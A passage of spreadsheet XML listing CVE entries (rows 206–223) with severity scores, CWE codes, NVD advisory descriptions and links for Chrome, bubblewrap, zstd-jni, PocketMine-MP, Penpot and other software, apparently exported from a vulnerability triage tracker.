          <t>Use after free in Chromecast in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87588</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87612</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87612</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87617</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Use after free in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87617</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87625</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87625</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87636</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Type confusion in XML in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87636</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87766</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in bubblewrap. During sandbox setup, creating files or directories under the new root can follow a parent symlink onto the host via /oldroot, writing attacker-chosen paths outside the sandbox as the launching user. This happens before the sandboxed process starts. This issue is GHSA-pxhw-h44j-8pfx. It is fixed in bubblewrap 0.12.0.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87766</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87795</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate offset and length parameters in the ZstdDictCompress constructor, allowing out-of-bounds memory reads. Attackers can supply untrusted offset or length values to read native heap memory into the compression dictionary, typically causing JVM crashes.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87795</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87823</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 performs 32-bit signed bounds checks on three direct-ByteBuffer frame-size native methods, allowing out-of-bounds memory reads via negative or overflowing offsets. Attackers can supply negative offset values near Integer.MIN_VALUE to read unmapped memory, causing JVM termination or extracting arbitrary frame size data from unintended memory locations.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87823</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87927</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 contains a local file inclusion vulnerability in the ajax and require-maxsite dispatchers that allows unauthenticated attackers to execute privileged handler files by supplying base64-encoded path traversal sequences. Attackers can bypass path validation checks and execute admin-gated handler actions without authentication to access sensitive functionality.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87927</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54355</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 fail to validate that the identityPublicKey in LoginPacket uses the required secp384r1 elliptic curve. Attackers can provide LoginPackets with keys using different curves or non-EC key types to pass login verification but trigger an uncaught exception during ECDH key derivation, crashing the server.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54355</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54390</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper null value handling in arrays. Attackers can send malformed JSON with unexpected null elements in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54390</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54393</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.20.5 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper validation in the JsonMapper dependency. Attackers can send malformed JSON structures in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54393</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58381</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
      <c r="Q218" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.11.1 contains a denial of service vulnerability in LoginPacket JSON processing that allows remote attackers to crash the server by sending malformed JSON data. Attackers can exploit improper object initialization from scalar JSON types to trigger unset required properties, causing the application to crash.</t>
        </is>
      </c>
      <c r="S218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58381</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58382</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr"/>
      <c r="Q219" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.6.0 contain polynomial time complexity vulnerabilities in Markdown parsing that allow attackers to cause denial of service. Attackers can submit carefully crafted Markdown inputs designed to trigger worst-case performance, and sending multiple requests in parallel exhausts CPU resources and PHP-FPM processes.</t>
        </is>
      </c>
      <c r="S219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58382</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14297</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>30a5e7fb-040d-440a-8cdf-a4a2068ce72e</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr"/>
      <c r="Q220" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in the Bluetooth Continuous Glucose
     Monitoring Service (CGMS) Record Access Control Point (RACP) write handler
     allows an authenticated BLE peer to overflow a 20-byte static buffer into
     adjacent BSS memory. The exploitable impact cannot be predetermined - it
     is entirely dependent on the linker-assigned BSS layout of the specific
     firmware build, which may vary.</t>
        </is>
      </c>
      <c r="S220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14297</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40877</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr"/>
      <c r="Q221" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-94</t>
        </is>
      </c>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to PHP object injection in the user preference functionality, which can lead to remote code execution. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40877</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47665</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr"/>
      <c r="Q222" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through file comments, whose content is stored as raw text and rendered into the page with innerHTML without any sanitization. Because the backend applies only a length check and the frontend writes comment content directly through innerHTML, any team member who can comment on a shared file can embed HTML such as an image error handler or script that executes in the browser of every other collaborator. The attack is passive: any user who opens the comments panel on the affected file triggers script execution on the Penpot origin, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="S222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47665</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53530</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr"/>
      <c r="Q223" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-248, CWE-400</t>
        </is>
      </c>
